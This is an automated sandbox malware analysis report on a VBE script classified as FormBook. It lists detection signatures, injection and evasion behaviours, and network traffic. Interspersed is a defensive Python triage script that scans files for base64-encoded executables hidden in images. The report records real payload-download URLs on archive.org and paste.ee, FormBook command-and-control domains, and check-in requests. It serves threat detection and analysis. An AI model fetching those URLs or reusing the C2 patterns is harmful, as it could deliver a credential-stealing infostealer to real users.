Windows Analysis Report
10092024150836 09.10.2024.vbe

Overview

General Information

Sample name: 10092024150836 09.10.2024.vbe
Analysis ID: 1530632
MD5: 17cd7d0a0b68a5c484a848750820837a
SHA1: bff3178427c48734726b5e144c86d0833cd8cc1f
SHA256: 5d14ce5f262c2b1f20ed43231cd1ba696a1eac262da9e20d1415045e1a985eea
Tags: vbe, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign process
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg Virustotal: Detection: 8% Perma Link
Source: 10092024150836 09.10.2024.vbe Virustotal: Detection: 7% Perma Link
Source: Yara match File source: 5.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown HTTPS traffic detected: 207.241.227.242:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000004.00000002.2390923201.00007FFD349B0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dllhost.pdbGCTL source: appidtel.exe, 00000005.00000002.2743775767.0000000002DB8000.00000004.00000020.00020000.00000000.sdmp, QEwzeZKCXN.exe, 0000000A.00000002.3410625566.0000000001198000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0309C3C0 FindFirstFileW,FindNextFileW,FindClose, 11_2_0309C3C0

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 4x nop then xor eax, eax 11_2_03089A80
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 4x nop then pop edi 11_2_0308E02B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 4x nop then pop edi 11_2_030A24F5
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 4x nop then mov ebx, 00000004h 11_2_036804E2
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 4x nop then pop edi 12_2_05451D61
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 4x nop then pop edi 12_2_05461CFB
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 4x nop then xor eax, eax 12_2_05456618
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 4x nop then pop edi 12_2_05452A60
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 4x nop then mov esp, ebp 12_2_05450AA0

Networking

Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49959 -> 172.96.186.204:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49965 -> 188.114.96.3:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49967 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49955 -> 18.163.12.6:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49960 -> 172.96.186.204:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49958 -> 172.96.186.204:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49963 -> 188.114.96.3:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49954 -> 18.163.12.6:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49956 -> 18.163.12.6:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49964 -> 188.114.96.3:80
Source: Network traffic Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49724 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.242:443 -> 192.168.2.6:49711
Source: unknown DNS query: name: paste.ee
Source: DNS query: www.568060007.xyz
Source: global traffic HTTP traffic detected: GET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1Host: ia600102.us.archive.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /d/mFPBh/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
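The Suricata alert above (2049038, base64-encoded payload in image) fires on the DetahNote_V.jpg fetched from archive.org, which the PowerShell stage uses as a carrier for its next stage. The script below is an added triage example; it is not part of the Joe Sandbox report and not the sample's own code. It scans a file for long runs of base64 alphabet and reports any run that decodes, forward or reversed, to an MZ, ELF or ZIP header. The carrier file is not reproduced in the report, so the JPEG-like inputs are constructed inside the script; the reversed-string case is included because the same PowerShell stage triggers the reversed-command Sigma rules, and it is an assumption that this campaign's carrier uses that orientation.

```python
import base64
import binascii
import re

# Magic bytes we care about when triaging a "payload in image" carrier.
MAGICS = {b"MZ": "MZ", b"\x7fELF": "ELF", b"PK\x03\x04": "ZIP"}


def _decode(candidate):
    """Strict base64 decode of one candidate run; None when it is not valid base64."""
    if candidate.startswith(b"="):
        # Padding first means this orientation is wrong (it is a reversed string).
        return None
    candidate = candidate[: len(candidate) - len(candidate) % 4]
    try:
        return base64.b64decode(candidate, validate=True)
    except (binascii.Error, ValueError):
        return None


def _magic(blob):
    for sig, name in MAGICS.items():
        if blob.startswith(sig):
            return name
    return None


def find_embedded_payloads(data, min_run=128):
    """Scan bytes for long base64 runs that decode (forward or reversed) to an executable.

    Returns one dict per hit: offset of the run, its length, which orientation decoded,
    the magic found and the decoded size. Runs shorter than min_run are ignored so that
    ordinary text or EXIF fields do not produce noise.
    """
    # Allow padding on either end so a reversed string (padding first) is captured whole.
    pattern = re.compile(rb"={0,2}[A-Za-z0-9+/]{%d,}={0,2}" % min_run)
    findings = []
    for m in pattern.finditer(data):
        run = m.group(0)
        for orientation, candidate in (("forward", run), ("reversed", run[::-1])):
            blob = _decode(candidate)
            if blob is None:
                continue
            magic = _magic(blob)
            if magic:
                findings.append({
                    "offset": m.start(),
                    "b64_len": len(run),
                    "orientation": orientation,
                    "magic": magic,
                    "decoded_len": len(blob),
                })
                break
    return findings


# Constructed test inputs (not the real DetahNote_V.jpg): a JFIF-style header, some
# filler, then a base64 blob that decodes to a fake PE stub beginning with "MZ".
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00" + bytes(range(256)) * 2
JPEG_HEAD = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01"
SAMPLE_FORWARD = JPEG_HEAD + b"\x00" * 16 + base64.b64encode(FAKE_PE) + b"\xff\xd9"
SAMPLE_REVERSED = JPEG_HEAD + b"\x00" * 16 + base64.b64encode(FAKE_PE)[::-1] + b"\xff\xd9"
SAMPLE_CLEAN = JPEG_HEAD + bytes(range(256)) * 4 + b"\xff\xd9"


if __name__ == "__main__":
    for name, sample in (("forward", SAMPLE_FORWARD), ("reversed", SAMPLE_REVERSED),
                         ("clean", SAMPLE_CLEAN)):
        print(name, find_embedded_payloads(sample))
```

Run it on a suspect download with `find_embedded_payloads(open(path, "rb").read())`. The offset tells you whether the blob was appended after the image data or sits inside it; either way, a JPEG that carries a decodable MZ header is not a picture, whatever the Content-Type said.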
Source: Joe Sandbox View IP Address: 13.248.169.48
Source: Joe Sandbox View IP Address: 188.114.96.3
Source: Joe Sandbox View ASN Name: AMAZON-02US
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: INTERNET-ARCHIVEUS
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /fx9f/?mBsxM=YJ0LnZ68&-Xr8=yLkskDR0nY0t6IEYTVnouV0HkzfvHuAPmfbD5h8cln4aJalo4AVzLarmhH7o5TO/QYT7rLdNwPAjvarY55z4bEJvcGnuntwn6BS5zidhK+0y0eRY5oQOsBmzZX59GbhTRCQZQus= HTTP/1.1Host: www.autoclean.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic HTTP traffic detected: GET /2jpw/?-Xr8=qz9UzJ10+p/cjPnRdZlHv4YDQxf45KubwzSEjjTwjD/nUvv1s93evwIp+LTko4UKBcY0h9JnEtV5jsbq23POiYFTmg8OGBnfOhN/rQscVBLiXL1oe2kzRKc9D7hJiq/ZgM9Sylw=&mBsxM=YJ0LnZ68 HTTP/1.1Host: www.568060007.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic HTTP traffic detected: GET /iaoq/?-Xr8=nL2348Pfr+NFoI01B13i6ooM2GhLPn5db8T/pNEZx3omavlXh0CLNHmy0NPG1pf7zjIobHCC6tPoB9SY98rXt0wu24FP/Owek6nccbtLOiVilNhWN1FN3veqOsXp1hjRF8Z6s4A=&mBsxM=YJ0LnZ68 HTTP/1.1Host: www.elitecbdgummies.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic HTTP traffic detected: GET /ojib/?-Xr8=9xYabYlQOuR2q+ns8Lzx9bRF8NZUoInv7x1TfUGCdfPrsqjtDMlDvLTTdBF+pu/1Frk+h/DxANwT0Hfs8j1jMkaM33w5ilCaxHtuGNiB0DtKNuQLcX24gGfpbrwRywwLDdzHNLM=&mBsxM=YJ0LnZ68 HTTP/1.1Host: www.airgame.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic DNS traffic detected: DNS query: ia600102.us.archive.org
Source: global traffic DNS traffic detected: DNS query: paste.ee
Source: global traffic DNS traffic detected: DNS query: www.autoclean.shop
Source: global traffic DNS traffic detected: DNS query: www.568060007.xyz
Source: global traffic DNS traffic detected: DNS query: www.elitecbdgummies.net
Source: global traffic DNS traffic detected: DNS query: www.airgame.store
Source: global traffic DNS traffic detected: DNS query: www.1ns6mg.vip
Source: unknown HTTP traffic detected: POST /2jpw/ HTTP/1.1Host: www.568060007.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-usConnection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 209Origin: http://www.568060007.xyzReferer: http://www.568060007.xyz/2jpw/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0Data Raw: 2d 58 72 38 3d 6e 78 56 30 77 35 35 72 78 5a 69 5a 72 66 44 5a 61 35 31 66 72 39 6b 6f 52 78 7a 45 31 71 4f 2b 6b 54 44 59 32 7a 6e 35 78 53 54 78 47 4a 2f 41 6a 64 6a 77 79 53 49 48 2f 35 62 4c 71 71 4a 6b 4d 6f 59 6f 6c 38 4d 52 46 50 56 38 30 75 2b 61 35 68 65 43 33 70 78 4d 6e 47 4e 31 4a 51 33 46 4e 41 31 4c 68 67 55 66 4d 6b 62 42 51 35 35 35 44 79 49 49 51 64 4d 48 4e 70 63 66 71 70 72 73 30 2b 6c 55 79 79 39 6e 58 70 42 41 5a 6a 66 75 33 46 79 48 70 57 43 4d 77 45 39 58 39 35 6c 59 43 37 35 68 44 53 76 2f 77 62 56 61 6b 47 35 4a 6c 61 38 49 32 41 45 58 71 6d 44 53 63 6b 2f 36 6d 41 33 7a 6c 4b 45 4b 6a 59 6f 4b Data Ascii: -Xr8=nxV0w55rxZiZrfDZa51fr9koRxzE1qO+kTDY2zn5xSTxGJ/AjdjwySIH/5bLqqJkMoYol8MRFPV80u+a5heC3pxMnGN1JQ3FNA1LhgUfMkbBQ555DyIIQdMHNpcfqprs0+lUyy9nXpBAZjfu3FyHpWCMwE9X95lYC75hDSv/wbVakG5Jla8I2AEXqmDSck/6mA3zlKEKjYoK
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: GETAccess-Control-Allow-Headers: Content-Type, AuthorizationDate: Thu, 10 Oct 2024 08:01:24 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 
